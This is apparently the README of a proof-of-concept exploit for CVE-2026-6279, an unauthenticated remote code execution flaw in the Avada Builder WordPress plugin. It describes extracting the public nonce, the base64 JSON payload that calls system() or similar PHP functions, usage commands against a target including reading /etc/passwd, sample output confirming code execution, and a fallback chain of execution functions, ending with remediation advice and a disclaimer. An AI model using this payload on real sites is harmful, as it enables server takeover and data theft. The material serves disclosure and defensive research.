## https://sploitus.com/exploit?id=50587955-5592-5287-A03D-6AB5FB6A1C8E
# CVE-2026-6279
CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 โ Unauthenticated Remote Code Execution via PHP Function Injection via 'render_logics' Shortcode Attribute via Widget AJAX Handler (fusion-builder)
# CVE-2026-6279 โ Avada Builder | Unauthenticated Remote Code Execution




> **Research by:** [Atomic Edge](https://atomicedge.io)
> **Plugin:** Avada Builder (WordPress)
> **Auth Required:** None | **Interaction:** None
---
## Overview
An unauthenticated Remote Code Execution vulnerability exists in the **Avada Builder** WordPress plugin. The `fusion_get_widget_markup` AJAX handler processes a `render_logics` parameter containing `wp_conditional_tags` conditions. The condition value is a Base64-encoded JSON object that specifies an arbitrary PHP **function name** and its **arguments**. Because no function whitelist is enforced, an attacker can invoke dangerous functions such as `system()`, `passthru()`, `exec()`, or `shell_exec()` with attacker-controlled arguments, resulting in full server-side command execution.
The only prerequisite is a valid `fusion_load_nonce`, which is **publicly embedded** in every page rendered by the plugin and can be extracted by any unauthenticated visitor.
---
## Attack Flow
```
1. GET / โ Extract fusion_load_nonce from page source
2. POST /wp-admin/admin-ajax.php โ Send crafted render_logics payload
โ condition_type: wp_conditional_tags
โ condition_value: base64({"function":"system","args":["id"]})
3. Parse response โ Read command output from HTTP response body
```
---
## Requirements
```bash
pip install requests
```
---
## Usage
```bash
# Basic โ runs 'id' command
python3 poc.py https://target.com
# Custom command
python3 poc.py https://target.com --cmd "whoami"
python3 poc.py https://target.com --cmd "cat /etc/passwd"
# Manual nonce (if auto-retrieval fails)
python3 poc.py https://target.com --nonce a1b2c3d4e5f6
# Verbose output
python3 poc.py https://target.com --cmd "uname -a" --verbose
```
### Arguments
| Flag | Description | Default |
|-------------|------------------------------------------------------|----------|
| `target` | Target WordPress URL | *(required)* |
| `--nonce` | Manually supply `fusion_load_nonce` (bypass auto-fetch) | auto |
| `--cmd` | OS command to execute on the remote server | `id` |
| `--verbose` | Show detailed request/response information | `false` |
### Example Output
```
[*] Attempting to retrieve fusion_load_nonce from homepage...
[+] Found nonce: 7f3a91bc2e
[*] Target: https://target.com
[*] Command: id
[*] Attempting exploit with function: system
[!!!] SUCCESS! RCE confirmed via function 'system'.
----------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
----------------------------------------
```
---
## Technical Details
### Nonce Extraction
The plugin inlines `fusion_load_nonce` into every page's JavaScript context:
```html
var fusionConfig = { "fusion_load_nonce": "7f3a91bc2e", ... }
```
This nonce is **not a secret** โ it is publicly accessible to any unauthenticated visitor and is required only as a basic CSRF token, not as an authentication mechanism.
### Payload Structure
The malicious `data` POST parameter contains:
```json
{
"widget_id": "exploit_widget",
"render_logics": [
{
"condition_type": "wp_conditional_tags",
"condition_value": ""
}
]
}
```
Where `condition_value` decodes to:
```json
{ "function": "system", "args": ["id"] }
```
The handler deserializes this object and calls the specified PHP function with the provided arguments โ with **no function name validation**.
### RCE Function Fallback Chain
The PoC automatically tries multiple PHP execution functions in order:
| Priority | Function | Notes |
|----------|---------------|------------------------------------|
| 1 | `system` | Outputs directly, easiest to detect |
| 2 | `passthru` | Raw binary output passthrough |
| 3 | `exec` | Returns last line only |
| 4 | `shell_exec` | Returns full output as string |
---
## Remediation
1. **Whitelist allowed condition types** โ reject any `condition_type` not in an explicit allowlist
2. **Never deserialize function names from user input** โ use a map of safe callable identifiers
3. **Validate `condition_value`** before processing โ reject unknown or dangerous function names
4. **Update immediately** to the patched version of Avada Builder
---
## Disclaimer
> This repository is intended for **authorized security research and educational purposes only**.
> Do not use this tool against any system without **explicit written permission** from the system owner.
> Unauthorized use may violate the CFAA (USA), Criminal Code s.342.1 (Canada), EU NIS2 Directive, and other applicable laws.
> The authors accept **no liability** for misuse or damages arising from this code.